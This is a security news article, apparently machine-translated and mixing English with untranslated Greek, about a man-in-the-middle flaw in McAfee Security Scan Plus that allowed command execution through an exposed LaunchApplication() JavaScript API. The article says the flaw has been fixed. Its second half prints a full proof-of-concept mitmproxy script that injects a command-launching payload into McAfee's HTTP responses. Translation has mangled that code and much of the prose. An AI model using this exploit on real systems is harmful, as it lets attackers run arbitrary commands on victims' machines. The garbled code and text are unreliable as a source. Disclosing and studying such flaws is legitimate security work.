McAfee Security Scan Plus: From this site you have read many times about security companies' negligence. McAfee's time has come. THE company φέρεται να επισκευάζει ένα σφάλμα που υπάρχει στο δωρεάν εργαλείο Security Scan Plus που ανακτά πληροφορίες από τους υπολογιστές των ενδιαφερομένων μέσω HTTP, δηλαδή σε μορφή απλού κειμένου.
The company seems to have forgotten what it preaches, or assumed that it is excluded that one thinks of man-in-the-middle attacks on its services, such as free online scanning, but also internal ads and the UI that displays them.
The vulnerability was discovered by SecuriTeam, που αναφέρει ότι το εργαλείο της ΜcAfee "ανακτά τις πληροφορίες από διαφορετικά domains του mcafee.com και τις εμφανίζει στον χρήστη, συνήθως στο κύριο παράθυρο της εφαρμογής".
Since HTTPS is not used to transport this information, the information can be modified by an attacker, who can then exploit the library that calls the tool (MCBRWSR2.DLL) to show that content HTML wishes.
This library exposes the JavaScript LaunchApplication () API, which very simply means that an attacker can execute any command he wants the victim to.
Το πρόγραμμα της ΜcAfee Security Scan Plus, μετά από κάθε σάρωση, εμφανίζει ένα στοιχείο UI που υποδεικνύει το "επίπεδο προστασίας" του στόχου στην ακόλουθη διεύθυνση URL:
http://home.mcafee.com/SecurityScanner/SSBanner.aspx
The information is displayed on the progress screen of the online scan, so the user can easily think that his computer is clean and actually just has been violated.
If you are now in the attacker's shoes, and performing a MITM attack, it is quite easy to run commands with the privileges of the logged in user, which in many cases is yourself accounts with that of the administrator.
The complete PoC only needs 38 lines of code. McAfee recognized the issue here and fixed it service on July.
See the PoC code
#! / usr / bin / env python3 # # HTTP proxy mode: # mitmproxy -s mcsploit_inline.py --ignore '. *' # # Transparent proxy mode: # mitmproxy -s mcsploit_inline.py -T # from mitmproxy import ctx, http import requests import time COMMAND = "c: \\\\ windows \\\\ system32 \\\\ calc.exe" CMDARGS = "" def response (flow): if flow.request.scheme == "http" and (flow.request.headers ['host']. endswith ("mcafee.com") or "mcafee" in flow.request.url): if flow.response.status_code == 302: ctx.log ("[+] [MCSPLOIT] Insecure McAfee request found! (HTML) ") https_url = flow.request.url.replace (" http: // "," https: // ") r = requests.get (https_url, headers = flow.request .headers, verify = False) if "text / html" not in r.headers ['content-type']: return contents = r.text contents = contents.replace ("", ""% (COMMAND, CMDARGS)) flow.response = http.HTTPResponse.make (200, bytes (contents, encoding =" utf-8 "), {" Content-Type ":" text / html; charset = utf-8 "," Expires ":" - 1 "}) return try: if flow.response.headers [" content-type "] ==" text / javascript ": ctx.log (" [+] [MCSPLOIT] Insecure McAfee request found! (JS) ") inject =" try {window.external.LaunchApplication (\ "% s \", \ "% s \");} catch (launchapperr) {var x;} \ n "% (COMMAND, CMDARGS) try: flow.response.contents = inject + flow.response.contents except AttributeError: ctx.log ("[-] [MCSPLOIT] No content in the original response!") Pass except KeyError: pass